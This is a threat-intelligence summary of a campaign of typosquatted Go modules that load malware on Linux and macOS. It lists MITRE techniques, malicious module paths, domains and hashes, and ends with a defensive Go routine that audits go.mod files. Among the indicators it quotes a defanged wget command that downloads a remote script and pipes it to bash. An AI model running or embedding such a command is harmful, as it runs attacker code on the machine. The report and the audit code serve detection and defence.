A recent analysis reveals a sustained malicious campaign targeting the Go ecosystem, using typosquatted packages to deliver loader malware to Linux and macOS systems. At least seven packages were identified impersonating popular Go libraries, with the deception aimed in particular at financial-sector developers. The malware employs obfuscation techniques and has been linked to multiple malicious domains, and the packages remain accessible on the Go Module Mirror. Affected: Go ecosystem, Linux, macOS, financial sector.
Key points:
- A malicious campaign targets the Go ecosystem with typosquatted packages.
- At least seven packages were identified, each impersonating a legitimate Go library.
- Financial-sector developers are a key target, particularly through impersonation of a Go library for HTTP API clients.
- The malware is designed for execution on Linux and macOS systems.
- Obfuscation techniques are used to evade detection.
- The malicious packages remain on the Go Module Mirror despite having been reported.
- The threat actor operates multiple domains associated with the malware.
- Developers are advised to vet dependencies carefully and to use real-time scanning tools.
MITRE Techniques:
- T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain (The malicious packages are typosquatted versions of legitimate libraries.)
- T1583.001 — Acquire Infrastructure: Domains (Malware utilizes domains that mimic legitimate websites.)
- T1608.001 — Stage Capabilities: Upload Malware (The threat actor uploads malicious packages to repositories.)
- T1204.002 — User Execution: Malicious File (The malicious payload executes on import of the package.)
- T1036.005 — Masquerading: Match Legitimate Name or Location (Typosquatted package names resemble legitimate library names.)
- T1027.013 — Obfuscated Files or Information: Encrypted/Encoded File (Malicious commands are obfuscated using arrays of strings.)
- T1546.016 — Event Triggered Execution: Installer Packages (Malicious packages invoke execution upon import.)
- T1059.004 — Command and Scripting Interpreter: Unix Shell (The payload executes shell commands using sh.)
- T1497 — Virtualization/Sandbox Evasion (The malware tactics evade basic detection tools.)
- T1657 — Financial Theft (Targets financial-sector developers for potential data theft.)
Indicators of Compromise:
- [Malicious Package] github.com/shallowmulti/hypert
- [Malicious Package] github.com/shadowybulk/hypert
- [Malicious Package] github.com/belatedplanet/hypert
- [Malicious Package] github.com/thankfulmai/hypert
- [Malicious Domain] alturastreet[.]icu
- [Malicious Domain] binghost7[.]com
- [IP Address] 185.100.157[.]127
- [Malicious Script] wget -O - https://alturastreet[.]icu/storage/de373d0df/a31546bf | /bin/bash
- [SHA256 Hash] b0d20a3dcb937da1ddb01684f6040bdbb920ac19446364e949ee8ba5b50a29e4
- [SHA256 Hash] f70bc9a8e39eb36547717197efe88173c23c1b9c206d253f0e24a8aaadf0f915
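As an added example (not code from the Socket report or from any project it names), the following Go routine audits a go.mod against the malicious module paths listed above and also flags lookalike paths that reuse an approved package name under a different namespace, which is the typosquatting pattern this campaign relies on. The sample go.mod, its version numbers and the "approved" upstream path are constructed placeholders.

```go
package main

import (
	"path"
	"strings"
)

// Constructed go.mod for this demo (not a real project file; versions are made up).
const sampleGoMod = `module example.com/payments

require (
	github.com/shallowmulti/hypert v0.0.1
	github.com/typo-example/hypert v0.1.0 // constructed lookalike, not from the report
	github.com/stretchr/testify v1.9.0
)
`

// Module paths the report lists as malicious.
var knownBad = map[string]bool{
	"github.com/shallowmulti/hypert": true, "github.com/shadowybulk/hypert": true,
	"github.com/belatedplanet/hypert": true, "github.com/thankfulmai/hypert": true,
}

// approved maps a package's last path element to the one module path the team allows
// for it; the value here is a placeholder, not the real upstream path.
var approved = map[string]string{"hypert": "github.com/APPROVED-ORG/hypert"}
type Finding struct{ Module, Reason string }

// Audit walks the require directives of a go.mod (single-line and block form) and
// flags exact IoC matches plus lookalikes: approved package name, different namespace.
func Audit(goMod string) []Finding {
	out, inBlock := []Finding{}, false
	for _, raw := range strings.Split(goMod, "\n") {
		line := strings.TrimSpace(raw)
		if line == "require (" || line == ")" {
			inBlock = line == "require ("
			continue
		}
		if line == "" || strings.HasPrefix(line, "//") || !(inBlock || strings.HasPrefix(line, "require ")) {
			continue // blank, comment, or a non-require directive (module, go, replace, ...)
		}
		m := strings.Fields(strings.TrimPrefix(line, "require "))[0]
		switch want, ok := approved[path.Base(m)]; {
		case knownBad[m]:
			out = append(out, Finding{m, "listed as malicious in the report"})
		case ok && want != m:
			out = append(out, Finding{m, "lookalike of approved module " + want})
		}
	}
	return out
}
```

Running Audit over a real go.mod in CI gives a cheap gate that catches both the exact paths from this report and future namespace-swapped imitations of an allowlisted package.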
Full Story: https://socket.dev/blog/typosquatted-go-packages-deliver-malware-loader